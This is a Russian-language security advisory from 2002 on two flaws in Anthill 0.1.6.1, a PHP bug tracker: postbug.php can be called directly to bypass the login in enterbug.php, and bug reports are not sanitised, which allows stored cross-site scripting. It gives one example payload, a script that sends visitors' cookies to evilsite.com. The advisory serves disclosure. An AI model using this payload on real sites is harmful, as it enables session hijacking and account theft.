Security Lab

Обход идентификации и межсайтовый скиптинг в Anthill

Дата публикации:09.04.2002
Всего просмотров:1100
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Anthill – система отслеживания ошибок (bug tracking) написанная в PHP.

1.Anthill содержит компонент postbug.php, который используется для обработки ошибок и добавления их в базу данных. При добавлении ошибки пользователи проходят аутентификацию в сценарии enterbug.php, который затем передает информацию для обработки к postbug.php. Поскольку postbug.PHP не требует никакой идентификации, нападающий может передавать команды непосредственно к postbug.php (через URL или, создавая соответствующую форму на удаленном Web сервере), таким образом, обходя механизма авторизации в enterbug.php.

2. Anthill не санирует пользовательский ввод, позволяя авторизованному пользователю вставлять произвольный HTML или JavaScript код при публикации ошибки. Этот код будет выполнен в браузерах других пользователей, при просмотре воздействуемой страницы.

Поскольку Anthill использует cookies для подтверждения подлинности пользователей, уязвимость может использоваться для перехвата опознавательных мандатов других пользователей.

Пример: <script>self.location.href="http://www.evilsite.com/evil?"+escape(document.
cookie)</script>

Уязвимость обнаружена в Anthill 0.1.6.1

Ссылки: Источник